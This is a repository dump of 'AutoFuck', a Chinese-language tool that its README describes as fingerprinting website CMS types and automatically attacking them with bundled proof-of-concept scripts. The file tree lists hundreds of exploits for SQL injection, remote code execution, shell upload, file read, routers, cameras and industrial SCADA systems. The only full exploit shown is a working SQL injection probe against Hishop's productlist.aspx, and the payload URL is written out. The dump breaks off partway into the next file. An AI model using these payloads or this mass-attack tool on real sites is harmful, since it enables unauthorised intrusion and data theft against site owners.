├── .gitignore
├── .history
├── AngelSword.py
├── CmsFind.py
├── README.md
├── __init__.py
├── autofuck.py
├── bin
└── goahead_payload.so
├── json
├── cms.json
├── cmspocdict.json
├── data.json
├── hardwarepocdict.json
├── industrialpocdict.json
├── informationpocdict.json
└── testcms.json
├── lib
├── __init__.py
├── gwhatweb.py
├── log.py
├── parser.py
└── spider.py
├── pocdb.py
├── pocs
├── __init__.py
├── cms
│ ├── Hishop
│ │ ├── __init__.py
│ │ └── hishop_productlist_sqli.py
│ ├── PKPMBS
│ │ ├── __init__.py
│ │ ├── pkpmbs_MsgList_sqli.py
│ │ ├── pkpmbs_addresslist_keyword_sqli.py
│ │ └── pkpmbs_guestbook_sqli.py
│ ├── __init__.py
│ ├── acsoft
│ │ ├── __init__.py
│ │ ├── acsoft_GetFileContent_fileread.py
│ │ ├── acsoft_GetFile_fileread.py
│ │ └── acsoft_GetXMLList_fileread.py
│ ├── autoset
│ │ ├── __init__.py
│ │ └── autoset_phpmyadmin_unauth.py
│ ├── cmseasy
│ │ ├── __init__.py
│ │ └── cmseasy_header_detail_sqli.py
│ ├── cmsmain.py
│ ├── dedecms
│ │ ├── __init__.py
│ │ ├── dedecms_download_redirect.py
│ │ ├── dedecms_error_trace_disclosure.py
│ │ ├── dedecms_recommend_sqli.py
│ │ ├── dedecms_search_typeArr_sqli.py
│ │ └── dedecms_version.py
│ ├── digital_campus
│ │ ├── __init__.py
│ │ ├── digital_campus_log_disclosure.py
│ │ └── digital_campus_systemcodelist_sqli.py
│ ├── discuz
│ │ ├── __init__.py
│ │ ├── discuz_focus_flashxss.py
│ │ ├── discuz_forum_message_ssrf.py
│ │ ├── discuz_plugin_ques_sqli.py
│ │ └── discuz_x25_path_disclosure.py
│ ├── diyou
│ │ ├── __init__.py
│ │ ├── dyp2p_latesindex_sqli.py
│ │ └── dyp2p_url_fileread.py
│ ├── dreamgallery
│ │ ├── __init__.py
│ │ └── dreamgallery_album_id_sqli.py
│ ├── dswjcms
│ │ ├── __init__.py
│ │ └── dswjcms_p2p_multi_sqli.py
│ ├── ecscms
│ │ ├── __init__.py
│ │ └── ecscms_MoreIndex_sqli.py
│ ├── ecshop
│ │ ├── __init__.py
│ │ ├── ecshop_flow_orderid_sqli.py
│ │ └── ecshop_uc_code_sqli.py
│ ├── esccms
│ │ ├── __init__.py
│ │ └── esccms_selectunitmember_unauth.py
│ ├── etmdcp
│ │ ├── __init__.py
│ │ └── etmdcp_Load_filedownload.py
│ ├── eyou
│ │ ├── __init__.py
│ │ ├── eyou_admin_id_sqli.py
│ │ ├── eyou_resetpw.py
│ │ ├── eyou_user_kw_sqli.py
│ │ └── eyou_weakpass.py
│ ├── fastmeeting
│ │ ├── __init__.py
│ │ └── fastmeeting_download_filedownload.py
│ ├── finecms
│ │ ├── __init__.py
│ │ └── finecms_uploadfile.py
│ ├── foosun
│ │ ├── __init__.py
│ │ └── foosun_City_ajax_sqli.py
│ ├── fsmcms
│ │ ├── __init__.py
│ │ ├── fsmcms_columninfo_sqli.py
│ │ ├── fsmcms_p_replydetail_sqli.py
│ │ └── fsmcms_setup_reinstall.py
│ ├── gobetters
│ │ ├── __init__.py
│ │ └── gobetters_multi_sqli.py
│ ├── gowinsoft_jw
│ │ ├── __init__.py
│ │ └── gowinsoft_jw_multi_sqli.py
│ ├── gpower
│ │ ├── __init__.py
│ │ └── gpower_users_disclosure.py
│ ├── hanweb
│ │ ├── __init__.py
│ │ ├── hanweb_VerifyCodeServlet_install.py
│ │ ├── hanweb_downfile_filedownload.py
│ │ └── hanweb_readxml_fileread.py
│ ├── iGenus
│ │ ├── __init__.py
│ │ ├── igenus_code_exec.py
│ │ ├── igenus_login_Lang_fileread.py
│ │ └── igenus_syslogin_Lang_fileread.py
│ ├── inspur
│ │ ├── __init__.py
│ │ ├── inspur_ecgap_displayNewsPic_sqli.py
│ │ └── inspur_multi_sqli.py
│ ├── iwms
│ │ ├── __init__.py
│ │ └── iwms_bypass_js_delete.py
│ ├── jeecg
│ │ ├── __init__.py
│ │ └── jeecg_pwd_reset.py
│ ├── jeecms
│ │ ├── __init__.py
│ │ └── jeecms_fpath_filedownload.py
│ ├── joomla
│ │ ├── __init__.py
│ │ ├── joomla_com_docman_lfi.py
│ │ └── joomla_index_list_sqli.py
│ ├── jumboecms
│ │ ├── __init__.py
│ │ └── jumboecms_slide_id_sqli.py
│ ├── kingdee
│ │ ├── __init__.py
│ │ ├── kingdee_conf_disclosure.py
│ │ ├── kingdee_filedownload.py
│ │ ├── kingdee_logoImgServlet_fileread.py
│ │ └── kingdee_resin_dir_path_disclosure.py
│ ├── kxmail
│ │ ├── __init__.py
│ │ └── kxmail_login_server_sqli.py
│ ├── lbcms
│ │ ├── __init__.py
│ │ └── lbcms_webwsfw_bssh_sqli.py
│ ├── libsys
│ │ ├── __init__.py
│ │ ├── libsys_ajax_asyn_link_fileread.py
│ │ ├── libsys_ajax_asyn_link_old_fileread.py
│ │ └── libsys_ajax_get_file_fileread.py
│ ├── live800
│ │ ├── __init__.py
│ │ ├── live800_downlog_filedownload.py
│ │ ├── live800_loginAction_sqli.py
│ │ ├── live800_services_xxe.py
│ │ └── live800_sta_export_sqli.py
│ ├── looyu
│ │ ├── __init__.py
│ │ └── looyu_down_filedownload.py
│ ├── metinfo
│ │ ├── __init__.py
│ │ ├── metinfo_getpassword_sqli.py
│ │ └── metinfo_login_check_sqli.py
│ ├── ndstar
│ │ ├── __init__.py
│ │ └── ndstar_six_sqli.py
│ ├── nitc
│ │ ├── __init__.py
│ │ ├── nitc_index_language_id_sqli.py
│ │ └── nitc_suggestwordList_sqli.py
│ ├── opensns
│ │ ├── __init__.py
│ │ ├── opensns_index_arearank.py
│ │ └── opensns_index_getshell.py
│ ├── others
│ │ ├── __init__.py
│ │ ├── alkawebs_viewnews_sqli.py
│ │ ├── anmai_grghjl_stuNo_sqli.py
│ │ ├── anmai_teachingtechnology_sqli.py
│ │ ├── caitong_multi_sleep_sqli.py
│ │ ├── caitong_multi_sqli.py
│ │ ├── cicro_DownLoad_filedownload.py
│ │ ├── clib_kindaction_fileread.py
│ │ ├── clib_kinweblistaction_download.py
│ │ ├── damall_selloffer_sqli.py
│ │ ├── dkcms_database_disclosure.py
│ │ ├── domino_unauth.py
│ │ ├── efuture_downloadAct_filedownload.py
│ │ ├── eis_menu_left_edit_sqli.py
│ │ ├── euse_study_multi_sqli.py
│ │ ├── gevercms_downLoadFile_filedownload.py
│ │ ├── gn_consulting_sqli.py
│ │ ├── gpcsoft_ewebeditor_weak.py
│ │ ├── gxwssb_fileDownloadmodel_download.py
│ │ ├── haohan_FileDown_filedownload.py
│ │ ├── hezhong_list_id_sqli.py
│ │ ├── hjsoft_sqli.py
│ │ ├── hnkj_researchinfo_dan_sqli.py
│ │ ├── hongan_dlp_struts_exec.py
│ │ ├── huaficms_bypass_js.py
│ │ ├── ips_community_suite_code_exec.py
│ │ ├── jiuyu_library_struts_exec.py
│ │ ├── jxt1039_unauth.py
│ │ ├── kj65n_monitor_sqli.py
│ │ ├── lianbang_multi_bypass_priv.py
│ │ ├── mainone_ProductList_sqli.py
│ │ ├── mainone_SupplyList_sqli.py
│ │ ├── mainone_b2b_Default_sqli.py
│ │ ├── mallbuilder_change_status_sqli.py
│ │ ├── mingteng_cookie_deception.py
│ │ ├── newedos_multi_sqli.py
│ │ ├── nongyou_Item2_sqli.py
│ │ ├── nongyou_ShowLand_sqli.py
│ │ ├── nongyou_multi_sqli.py
│ │ ├── nongyou_sleep_sqli.py
│ │ ├── rap_interface_struts_exec.py
│ │ ├── shiyou_list_keyWords_sqli.py
│ │ ├── sinda_downloadfile_download.py
│ │ ├── skytech_bypass_priv.py
│ │ ├── skytech_geren_list_page_sqli.py
│ │ ├── star_PostSuggestion_sqli.py
│ │ ├── suntown_upfile_fileupload.py
│ │ ├── tianbo_Class_Info_sqli.py
│ │ ├── tianbo_St_Info_sqli.py
│ │ ├── tianbo_TCH_list_sqli.py
│ │ ├── tianbo_Type_List_sqli.py
│ │ ├── tpshop_eval_stdin_code_exec.py
│ │ ├── workyi_multi_sqli.py
│ │ ├── xtcms_download_filedownload.py
│ │ ├── xuezi_ceping_unauth.py
│ │ ├── yaojie_steel_struts_exec.py
│ │ ├── yeu_disclosure_uid.py
│ │ ├── zf_cms_FileDownload.py
│ │ ├── zfcgxt_UserSecurityController_getpass.py
│ │ └── zhuofan_downLoadFile_download.py
│ ├── pageadmin
│ │ ├── __init__.py
│ │ └── pageadmin_forge_viewstate.py
│ ├── php168
│ │ ├── __init__.py
│ │ └── php168_login_getshell.py
│ ├── phpcms
│ │ ├── __init__.py
│ │ ├── phpcms_authkey_disclosure.py
│ │ ├── phpcms_digg_add_sqli.py
│ │ ├── phpcms_flash_upload_sqli.py
│ │ ├── phpcms_product_code_exec.py
│ │ ├── phpcms_v961_fileread.py
│ │ ├── phpcms_v96_sqli.py
│ │ └── phpcms_v9_flash_xss.py
│ ├── phpmyadmin
│ │ ├── __init__.py
│ │ └── phpmyadmin_setup_lfi.py
│ ├── phpok
│ │ ├── __init__.py
│ │ ├── phpok_api_param_sqli.py
│ │ ├── phpok_remote_image_getshell.py
│ │ └── phpok_res_action_control_filedownload.py
│ ├── phpstudy
│ │ ├── __init__.py
│ │ ├── phpstudy_phpmyadmin_defaultpwd.py
│ │ └── phpstudy_probe.py
│ ├── piaoyou
│ │ ├── __init__.py
│ │ ├── piaoyou_int_order_sqli.py
│ │ ├── piaoyou_multi_sqli.py
│ │ ├── piaoyou_newsview_list.py
│ │ ├── piaoyou_six2_sqli.py
│ │ ├── piaoyou_six_sqli.py
│ │ └── piaoyou_ten_sqli.py
│ ├── pstar
│ │ ├── __init__.py
│ │ ├── pstar_isfLclInfo_sqli.py
│ │ ├── pstar_qcustoms_sqli.py
│ │ └── pstar_warehouse_msg_01_sqli.py
│ ├── qibocms
│ │ ├── __init__.py
│ │ ├── qibocms_js_f_id_sqli.py
│ │ ├── qibocms_s_fids_sqli.py
│ │ ├── qibocms_search_code_exec.py
│ │ └── qibocms_search_sqli.py
│ ├── ruvar
│ │ ├── __init__.py
│ │ ├── ruvar_oa_multi_sqli.py
│ │ ├── ruvar_oa_multi_sqli2.py
│ │ └── ruvar_oa_multi_sqli3.py
│ ├── seacms
│ │ ├── __init__.py
│ │ ├── seacms_order_code_exec.py
│ │ ├── seacms_search_code_exec.py
│ │ └── seacms_search_jq_code_exec.py
│ ├── shadowsit
│ │ ├── __init__.py
│ │ └── shadowsit_selector_lfi.py
│ ├── shop360
│ │ ├── __init__.py
│ │ └── shop360_do_filedownload.py
│ ├── shop7z
│ │ ├── __init__.py
│ │ └── shop7z_order_checknoprint_sqli.py
│ ├── shopex
│ │ ├── __init__.py
│ │ └── shopex_phpinfo_disclosure.py
│ ├── shopnc
│ │ ├── __init__.py
│ │ └── shopnc_index_class_id_sqli.py
│ ├── shopnum
│ │ ├── __init__.py
│ │ ├── shopnum_GuidBuyList_sqli.py
│ │ ├── shopnum_ProductDetail_sqli.py
│ │ ├── shopnum_ProductListCategory_sqli.py
│ │ └── shopnum_ShoppingCart1_sqli.py
│ ├── siteengine
│ │ ├── __init__.py
│ │ └── siteengine_comments_module_sqli.py
│ ├── siteserver
│ │ ├── __init__.py
│ │ ├── siteserver_UserNameCollection_sqli.py
│ │ ├── siteserver_background_administrator_sqli.py
│ │ ├── siteserver_background_keywordsFilting_sqli.py
│ │ ├── siteserver_background_log_sqli.py
│ │ └── siteserver_background_taskLog_sqli.py
│ ├── smartoa
│ │ ├── __init__.py
│ │ └── smartoa_multi_filedownload.py
│ ├── speedcms
│ │ ├── __init__.py
│ │ └── speedcms_list_cid_sqli.py
│ ├── tcexam
│ │ ├── __init__.py
│ │ └── tcexam_reinstall_getshell.py
│ ├── thinkphp
│ │ ├── __init__.py
│ │ ├── onethink_category_sqli.py
│ │ └── thinkphp_code_exec.py
│ ├── thinksns
│ │ ├── __init__.py
│ │ └── thinksns_category_code_exec.py
│ ├── trs
│ │ ├── __init__.py
│ │ ├── trs_ids_auth_disclosure.py
│ │ ├── trs_infogate_register.py
│ │ ├── trs_infogate_xxe.py
│ │ ├── trs_inforadar_disclosure.py
│ │ ├── trs_lunwen_papercon_sqli.py
│ │ ├── trs_was40_passwd_disclosure.py
│ │ ├── trs_was40_tree_disclosure.py
│ │ ├── trs_was5_config_disclosure.py
│ │ ├── trs_was5_download_templet.py
│ │ ├── trs_wcm_default_user.py
│ │ ├── trs_wcm_infoview_disclosure.py
│ │ ├── trs_wcm_pre_as_lfi.py
│ │ └── trs_wcm_service_writefile.py
│ ├── typecho
│ │ ├── __init__.py
│ │ └── typecho_install_code_exec.py
│ ├── umail
│ │ ├── __init__.py
│ │ ├── umail_physical_path.py
│ │ └── umail_sessionid_access.py
│ ├── uniportal
│ │ ├── __init__.py
│ │ └── uniportal_bypass_priv_sqli.py
│ ├── urp
│ │ ├── __init__.py
│ │ ├── urp_ReadJavaScriptServlet_fileread.py
│ │ ├── urp_query.py
│ │ └── urp_query2.py
│ ├── v2tech
│ │ ├── __init__.py
│ │ └── v2Conference_sqli_xxe.py
│ ├── viewgood
│ │ ├── __init__.py
│ │ ├── viewgood_GetCaption_sqli.py
│ │ ├── viewgood_pic_proxy_sqli.py
│ │ └── viewgood_two_sqli.py
│ ├── weaver_oa
│ │ ├── __init__.py
│ │ ├── weaver_oa_db_disclosure.py
│ │ ├── weaver_oa_download_sqli.py
│ │ └── weaver_oa_filedownload.py
│ ├── wecenter
│ │ ├── __init__.py
│ │ └── wecenter_topic_id_sqli.py
│ ├── weway
│ │ ├── __init__.py
│ │ └── weway_PictureView1_filedownload.py
│ ├── wizbank
│ │ ├── __init__.py
│ │ ├── wizbank_download_filedownload.py
│ │ └── wizbank_usr_id_sqli.py
│ ├── wordpress
│ │ ├── __init__.py
│ │ ├── wordpress_admin_ajax_filedownload.py
│ │ ├── wordpress_display_widgets_backdoor.py
│ │ ├── wordpress_plugin_ShortCode_lfi.py
│ │ ├── wordpress_plugin_azonpop_sqli.py
│ │ ├── wordpress_plugin_mailpress_rce.py
│ │ ├── wordpress_restapi_sqli.py
│ │ ├── wordpress_url_redirect.py
│ │ └── wordpress_woocommerce_code_exec.py
│ ├── xplus
│ │ ├── __init__.py
│ │ ├── xplus_2003_getshell.py
│ │ └── xplus_mysql_mssql_sqli.py
│ ├── yonyou
│ │ ├── __init__.py
│ │ ├── yonyou_a8_CmxUser_sqli.py
│ │ ├── yonyou_a8_logs_disclosure.py
│ │ ├── yonyou_a8_personService_xxe.py
│ │ ├── yonyou_cm_info_content_sqli.py
│ │ ├── yonyou_createMysql_disclosure.py
│ │ ├── yonyou_ehr_ELTextFile.py
│ │ ├── yonyou_ehr_resetpwd_sqli.py
│ │ ├── yonyou_fe_treeXml_sqli.py
│ │ ├── yonyou_getemaildata_fileread.py
│ │ ├── yonyou_icc_struts2.py
│ │ ├── yonyou_initData_disclosure.py
│ │ ├── yonyou_multi_union_sqli.py
│ │ ├── yonyou_nc_NCFindWeb_fileread.py
│ │ ├── yonyou_status_default_pwd.py
│ │ ├── yonyou_test_sqli.py
│ │ ├── yonyou_u8_CmxItem_sqli.py
│ │ └── yonyou_user_ids_sqli.py
│ ├── zfsoft
│ │ ├── __init__.py
│ │ ├── xml
│ │ │ ├── zfsoft_service_stryhm_sqli_false.xml
│ │ │ └── zfsoft_service_stryhm_sqli_true.xml
│ │ ├── zfsoft_database_control.py
│ │ ├── zfsoft_default3_bruteforce.py
│ │ └── zfsoft_service_stryhm_sqli.py
│ └── zuitu
│ │ ├── __init__.py
│ │ └── zuitu_coupon_id_sqli.py
├── hardware
│ ├── __init__.py
│ ├── camera
│ │ ├── __init__.py
│ │ ├── camera_hikvision_web_weak.py
│ │ └── camera_uniview_dvr_rce.py
│ ├── firewall
│ │ ├── __init__.py
│ │ └── juniper_netscreen_backdoor.py
│ ├── gateway
│ │ ├── __init__.py
│ │ ├── adtsec_Overall_app_js_bypass.py
│ │ ├── adtsec_gateway_struts_exec.py
│ │ ├── mpsec_weakpass_exec.py
│ │ └── mpsec_webui_filedownload.py
│ ├── hardwaremain.py
│ ├── printer
│ │ ├── __init__.py
│ │ ├── printer_canon_unauth.py
│ │ ├── printer_hp_jetdirect_unauth.py
│ │ ├── printer_topaccess_unauth.py
│ │ └── printer_xerox_default_pwd.py
│ └── router
│ │ ├── __init__.py
│ │ ├── router_dlink_command_exec.py
│ │ ├── router_dlink_webproc_fileread.py
│ │ └── router_ruijie_unauth.py
├── industrial
│ ├── __init__.py
│ ├── dfe_scada_conf_disclosure.py
│ ├── industrialmain.py
│ ├── rockontrol_weak.py
│ ├── sgc8000_defaultuser_disclosure.py
│ ├── sgc8000_deldata_config_disclosure.py
│ ├── sgc8000_sg8k_sms_disclosure.py
│ ├── wireless_monitor_priv_elevation.py
│ ├── zte_wireless_getChannelByCountryCode_sqli.py
│ └── zte_wireless_weak_pass.py
├── information
│ ├── __init__.py
│ ├── apache_server_status_disclosure.py
│ ├── crossdomain_find.py
│ ├── git_check.py
│ ├── informationmain.py
│ ├── jetbrains_ide_workspace_disclosure.py
│ ├── jsp_conf_find.py
│ ├── options_method.py
│ ├── robots_find.py
│ ├── springboot_api.py
│ └── svn_check.py
└── system
│ ├── __init__.py
│ ├── bash
│ ├── __init__.py
│ └── shellshock.py
│ ├── couchdb
│ ├── __init__.py
│ └── couchdb_unauth.py
│ ├── dorado
│ ├── __init__.py
│ └── dorado_default_passwd.py
│ ├── glassfish
│ ├── __init__.py
│ └── glassfish_fileread.py
│ ├── goahead
│ ├── __init__.py
│ ├── bin
│ │ └── goahead_payload.so
│ └── goahead_LD_PRELOAD_rce.py
│ ├── hfs
│ ├── __init__.py
│ └── hfs_rejetto_search_rce.py
│ ├── hudson
│ ├── __init__.py
│ └── hudson_ws_disclosure.py
│ ├── iis
│ ├── __init__.py
│ ├── iis_ms15034_httpsys_rce.py
│ └── iis_webdav_rce.py
│ ├── intel
│ ├── __init__.py
│ └── intel_amt_crypt_bypass.py
│ ├── kinggate
│ ├── __init__.py
│ └── kinggate_zebra_conf.py
│ ├── mongodb
│ ├── __init__.py
│ └── mongodb_unauth.py
│ ├── nginx
│ ├── __init__.py
│ └── multi_fastcgi_code_exec.py
│ ├── others
│ ├── __init__.py
│ ├── forease_fileinclude_code_exec.py
│ └── moxa_oncell_telnet.py
│ ├── php
│ ├── __init__.py
│ ├── php_expose_disclosure.py
│ └── php_fastcgi_read.py
│ ├── redis
│ ├── __init__.py
│ └── redis_unauth.py
│ ├── resin
│ ├── __init__.py
│ └── resin_viewfile_fileread.py
│ ├── sangfor
│ ├── __init__.py
│ └── sangfor_ad_script_command_exec.py
│ ├── smtp
│ ├── __init__.py
│ └── smtp_starttls_plaintext_inj.py
│ ├── srun
│ ├── __init__.py
│ ├── srun_download_file_filedownload.py
│ ├── srun_index_file_filedownload.py
│ ├── srun_rad_online_bypass_rce.py
│ ├── srun_rad_online_username_rce.py
│ └── srun_user_info_uid_rce.py
│ ├── ssl
│ ├── __init__.py
│ └── openssl_heartbleed.py
│ ├── systemmain.py
│ ├── tomcat
│ ├── __init__.py
│ ├── tomcat_put_exec.py
│ └── tomcat_weak_pass.py
│ ├── topsec
│ ├── __init__.py
│ └── topsec_change_lan_filedownload.py
│ ├── turbomail
│ ├── __init__.py
│ ├── turbogate_services_xxe.py
│ └── turbomail_conf.py
│ ├── vhost
│ ├── __init__.py
│ ├── hac_gateway_info_disclosure.py
│ ├── npoint_mdb_download.py
│ └── zkeys_database_conf.py
│ ├── weblogic
│ ├── __init__.py
│ ├── weblogic_interface_disclosure.py
│ ├── weblogic_ssrf.py
│ ├── weblogic_weak_pass.py
│ └── weblogic_xmldecoder_exec.py
│ ├── zabbix
│ ├── __init__.py
│ └── zabbix_jsrpc_profileIdx2_sqli.py
│ └── zookeeper
│ ├── __init__.py
│ └── zookeeper_unauth.py
├── requirements.txt
├── scan
├── __init__.py
├── arbitrarily_filefuzz_check.py
└── xss_characterfuzz_check.py
├── systempocdict.json
├── target.txt
└── xml
├── zfsoft_service_stryhm_sqli_false.xml
└── zfsoft_service_stryhm_sqli_true.xml
/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | __pycache__/
3 | .idea/
4 |
--------------------------------------------------------------------------------
/.history:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/.history
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # AutoFuck
2 | AutoFuck是由AngelSword项目的poc拿过来重写的一个新项目, 可以批量识别网站cms类型,并且加载相关poc自动攻击。
3 | 嗯, 为什么没有人真正写一点有用的东西呢?
4 |
5 | 还在开发,各位. 请等待.
6 |
7 |
8 | # 使用用法
9 | 
10 |
11 |
12 |
13 | # 平台
14 | macOS / Linux + Python 3
15 |
16 |
17 | # 需要用到的模块
18 | bs4
19 | json
20 | redis
21 | urllib
22 | pexpect
23 | termcolor
24 | hashlib
25 | telnetlib
26 | pymysql
27 | pymongo
28 |
29 |
30 | # 说明
31 | 1.部分代码参考网上公开的脚本。
32 |
33 | 2.本工具仅限于进行漏洞验证,如若因此引起相关法律问题,概不负责。
34 |
35 | 3.所有POC均为开源,以后也一直如此,供大家参考和学习。如果有提供POC的朋友可以私发👇👇邮箱。
36 |
37 |
38 |
39 | # bugs
40 | hacktext@163.com
41 |
42 |
--------------------------------------------------------------------------------
/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*- #
3 | __author__ = 'fengxuan'
--------------------------------------------------------------------------------
/bin/goahead_payload.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/bin/goahead_payload.so
--------------------------------------------------------------------------------
/json/industrialpocdict.json:
--------------------------------------------------------------------------------
1 | [{"method": "dfe_scada_conf_disclosure_BaseVerify", "description": "\u4e1c\u65b9\u7535\u5b50SCADA\u901a\u7528\u7cfb\u7edf\u4fe1\u606f\u6cc4\u9732"}, {"method": "zte_wireless_getChannelByCountryCode_sqli_BaseVerify", "description": "zte \u65e0\u7ebf\u63a7\u5236\u5668 SQL\u6ce8\u5165"}, {"method": "rockontrol_weak_BaseVerify", "description": "\u706b\u529b\u53d1\u7535\u80fd\u8017\u76d1\u6d4b\u5f31\u53e3\u4ee4"}, {"method": "sgc8000_defaultuser_disclosure_BaseVerify", "description": "sgc8000\u76d1\u63a7\u7cfb\u7edf\u8d85\u7ba1\u8d26\u53f7\u6cc4\u9732\u6f0f\u6d1e"}, {"method": "sgc8000_deldata_config_disclosure_BaseVerify", "description": "sgc8000 \u76d1\u63a7\u7cfb\u7edf\u6570\u636e\u8fde\u63a5\u4fe1\u606f\u6cc4\u9732"}, {"method": "sgc8000_sg8k_sms_disclosure_BaseVerify", "description": "sgc8000 \u5927\u578b\u65cb\u8f6c\u673a\u76d1\u63a7\u7cfb\u7edf\u62a5\u8b66\u77ed\u4fe1\u6a21\u5757\u6cc4\u9732"}, {"method": "zte_wireless_weak_pass_BaseVerify", "description": "\u4e2d\u5174\u65e0\u7ebf\u63a7\u5236\u5668\u5f31\u53e3\u4ee4"}, {"method": "wireless_monitor_priv_elevation_BaseVerify", "description": "\u65b0\u529b\u70ed\u7535\u65e0\u7ebf\u6284\u8868\u76d1\u63a7\u7cfb\u7edf\u7ed5\u8fc7\u540e\u53f0\u767b\u5f55"}]
--------------------------------------------------------------------------------
/json/informationpocdict.json:
--------------------------------------------------------------------------------
1 | [{"method": "svn_check_BaseVerify", "description": "svn\u6e90\u7801\u6cc4\u9732\u626b\u63cf"}, {"method": "robots_find_BaseVerify", "description": "robots\u6587\u4ef6\u53d1\u73b0"}, {"method": "options_method_BaseVerify", "description": "options\u65b9\u6cd5\u5f00\u542f"}, {"method": "jsp_conf_find_BaseVerify", "description": "java\u914d\u7f6e\u6587\u4ef6\u6587\u4ef6\u53d1\u73b0"}, {"method": "git_check_BaseVerify", "description": "git\u6e90\u7801\u6cc4\u9732\u626b\u63cf"}, {"method": "apache_server_status_disclosure_BaseVerify", "description": "apache server-status\u4fe1\u606f\u6cc4\u9732"}, {"method": "springboot_api_BaseVerify", "description": "spring boot \u8def\u5f84\u6cc4\u9732"}, {"method": "jetbrains_ide_workspace_disclosure_BaseVerify", "description": "JetBrains IDE workspace.xml\u6587\u4ef6\u6cc4\u9732"}, {"method": "crossdomain_find_BaseVerify", "description": "crossdomain.xml\u6587\u4ef6\u53d1\u73b0"}]
--------------------------------------------------------------------------------
/lib/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*- #
3 | __author__ = 'fengxuan'
--------------------------------------------------------------------------------
/lib/log.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*- #
3 | __author__ = 'fengxuan'
4 |
5 | import logging
6 |
# Import-time side effect: configures the root logger to emit INFO and above,
# with each record prefixed by a timestamp.
logging.basicConfig(
    format='[%(asctime)s] %(message)s',
    datefmt='%Y:%m:%d %H:%M:%S',
    level=logging.INFO,
)
# Named logger shared with other modules (lib/parser.py imports it).
logger = logging.getLogger('running')
--------------------------------------------------------------------------------
/lib/parser.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*- #
3 | __author__ = 'fengxuan'
4 |
5 | import hashlib
6 | import re
7 | from .log import logger
8 |
9 |
10 |
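def _GetMd5(body):
    """Return the hexadecimal MD5 digest of *body*, used as a page fingerprint.

    MD5 is used here only to compare a response with a known value taken from
    a rule; it is not a security control.

    :param body: response body as ``bytes``, or as ``str`` (encoded as UTF-8
        before hashing).
    :return: 32-character lowercase hex digest.
    """
    if isinstance(body, str):
        # checkcms() passes ``req_obj.text``; hashlib rejects str on Python 3,
        # so encode it first. A digest of re-encoded text can differ from the
        # digest of the raw bytes when the page was not served as UTF-8.
        body = body.encode('utf-8')
    return hashlib.md5(body).hexdigest()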
15 |
16 |
def checkcms(req_obj, rule):
    '''
    Score one fingerprint rule against an HTTP response.

    ``rule`` is a dict with the keys ``method``, ``value`` and ``weight``,
    for example {"method": "code", "value": 200, "weight": 75}.

    :param req_obj: response object; ``.text`` and ``.status_code`` are read.
    :param rule: the fingerprint rule described above.
    :return: ``rule['weight']`` when the rule matches, otherwise 0.
    '''
    kind = rule['method']

    if kind == 're':
        # re.match anchors at the start of the body, so the pattern has to
        # account for whatever precedes the text it is looking for.
        matched = re.compile(rule['value'], re.I).match(req_obj.text)
    elif kind == 'md5':
        matched = _GetMd5(req_obj.text) == rule['value']
    elif kind == 'code':
        matched = req_obj.status_code == rule['value']
    else:
        # Unknown rule types never contribute to the score.
        matched = False

    return rule['weight'] if matched else 0
41 |
--------------------------------------------------------------------------------
/pocs/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*- #
3 | __author__ = 'fengxuan'
--------------------------------------------------------------------------------
/pocs/cms/Hishop/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/Hishop/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/Hishop/hishop_productlist_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: Hishop系统productlist.aspx SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0154499
6 | author: Lucifer
7 | description: Hishop易分销系统/wapshop/productlist.aspx文件中参数sort存在注入
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class hishop_productlist_sqli_BaseVerify:
    """Check one site for the Hishop ``/wapshop/productlist.aspx`` SQL injection.

    The probe puts a SQL expression into the ``sort`` query parameter that asks
    the database for the MD5 of the constant ``1234``; a finding is printed
    only when that digest appears in the response body.

    NOTE(review): on the defending side this request stands out in web or WAF
    logs: ``hashbytes`` / ``fn_varbintohexstr`` inside ``sort`` on
    ``productlist.aspx`` is not part of normal traffic.
    """

    def __init__(self, url):
        # Base URL of the site to check; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send the single GET probe and print a finding if the marker is echoed."""
        probe_path = "/wapshop/productlist.aspx?sort=char(sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27)))"
        # Hex MD5 of "1234", the value the injected expression computes.
        marker = "81dc9bdb52d04dc20036dbd8313ed055"
        vulnurl = self.url + probe_path
        try:
            # verify=False disables TLS certificate validation, so the host
            # that answers is not authenticated.
            response = requests.get(vulnurl, timeout=10, verify=False)
            if marker in response.text:
                cprint("[+]存在Hishop SQL注入漏洞...(高危)\tpayload: " + vulnurl, "red")
        except:
            # Bare except: every failure (DNS, TLS, a bug in this method) is
            # printed as "connection timed out", so this line does not prove
            # the host was unreachable.
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
29 |
if __name__ == "__main__":
    # Standalone use: the only command-line argument is the base URL to check.
    # filterwarnings("ignore") hides every warning category, including the
    # notice about unverified HTTPS requests caused by verify=False.
    warnings.filterwarnings("ignore")
    hishop_productlist_sqli_BaseVerify(sys.argv[1]).run()
34 |
--------------------------------------------------------------------------------
/pocs/cms/PKPMBS/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/PKPMBS/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/PKPMBS/pkpmbs_guestbook_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
